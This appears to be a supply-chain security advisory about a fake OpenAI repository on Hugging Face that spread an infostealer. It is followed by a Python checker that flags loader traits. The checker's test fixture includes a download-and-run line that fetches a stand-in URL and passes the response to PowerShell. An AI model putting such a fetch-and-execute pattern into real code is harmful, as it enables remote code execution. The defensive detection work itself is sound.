Typosquatted OpenAI Repository on Hugging Face Distributes Infostealer Malware to Windows Users
What Happened — A malicious repository on Hugging Face impersonated OpenAI’s “Privacy Filter” project. The repo, titled Open-OSS/privacy-filter, delivered a Python loader that fetched and executed a Rust‑based infostealer on Windows machines, stealing browser data, crypto wallets, Discord tokens, and system information. The repository briefly hit #1 on Hugging Face’s trending list and recorded 244 000 downloads before removal.
Why It Matters for TPRM (Third‑Party Risk Management) —
- Third‑party model‑sharing platforms can be weaponised to distribute malware to downstream developers and enterprises.
- Compromise of credential stores and crypto wallets creates downstream supply‑chain risk for any organisation that integrates the malicious model.
- The campaign demonstrates how “trusted” AI repositories can be abused, highlighting the need for rigorous vetting of external code assets.
Who Is Affected — SaaS and cloud‑based AI/ML developers, data‑science teams, and any organisation that downloads models or scripts from public model hubs.
Recommended Actions —
- Review any usage of Hugging Face repositories; verify source authenticity before integration.
- Enforce code‑signing and sandbox execution for downloaded scripts.
- Update endpoint protection to detect the loader’s PowerShell and batch behaviours.
- Conduct credential rotation for any accounts that may have been exposed.
Technical Notes — The loader disables SSL verification, decodes a base64‑encoded URL, and runs a PowerShell command that downloads a batch file. The batch file escalates privileges, adds the final Rust infostealer to Microsoft Defender’s exclusion list, and exfiltrates the stolen data to recargapopular.]com. Anti‑analysis checks target VMs, sandboxes, and debuggers. No CVE is associated; the vector is a supply‑chain malware drop via a third‑party repository. Source: [BleepingComputer
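One way to act on the vetting recommendation above is to statically triage a downloaded script for the loader traits the Technical Notes describe (disabled TLS verification, a base64‑encoded URL, a hand‑off to PowerShell via a spawned process). The following checker is an added example, not code from the advisory or from BleepingComputer; it assumes Python 3.9+, and both sample scripts and the `example.invalid` URL are constructed fixtures, not the real loader.

```python
import ast
import base64
import re

# Traits taken from the advisory's loader description; the fixtures below are constructed.
POWERSHELL_RE = re.compile(r"powershell", re.IGNORECASE)
B64_LITERAL_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def _hides_url(literal: str) -> bool:
    # True when a base64-looking string literal decodes to an http(s) URL.
    if not B64_LITERAL_RE.fullmatch(literal):
        return False
    try:
        decoded = base64.b64decode(literal, validate=True).decode()
    except (ValueError, UnicodeDecodeError):
        return False
    return decoded.startswith(("http://", "https://"))

def triage_script(source: str) -> list[str]:
    # Return the sorted set of loader traits found in a Python source text.
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Attribute) and node.attr == "_create_unverified_context":
            findings.add("tls_verification_disabled")      # ssl verification turned off
        elif isinstance(node, ast.Call):
            callee = ast.unparse(node.func)                # e.g. 'requests.get'
            if any(k.arg == "verify" and isinstance(k.value, ast.Constant)
                   and k.value.value is False for k in node.keywords):
                findings.add("tls_verification_disabled")  # requests.get(..., verify=False)
            if callee.endswith("b64decode"):
                findings.add("base64_decode")              # decoding a hidden URL or command
            if callee.startswith("subprocess."):
                findings.add("process_spawn")              # handing off to PowerShell/batch
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if POWERSHELL_RE.search(node.value):
                findings.add("powershell_string")
            if _hides_url(node.value):
                findings.add("base64_encoded_url")
    return sorted(findings)

# Constructed fixtures (not the real loader): one benign script, one showing the traits.
SAMPLE_BENIGN = '''import requests
resp = requests.get("https://huggingface.co/api/models", timeout=10)
print(resp.status_code)
'''
ENCODED_URL = base64.b64encode(b"https://example.invalid/stage").decode()
SAMPLE_SUSPECT = f'''import base64, subprocess, requests
url = base64.b64decode("{ENCODED_URL}").decode()
resp = requests.get(url, verify=False)
subprocess.run(["powershell", "-Command", resp.text])
'''
```

Run `triage_script` over each `.py` file in a downloaded repository before it is imported or executed; a hit on several traits together is the signal to quarantine rather than integrate.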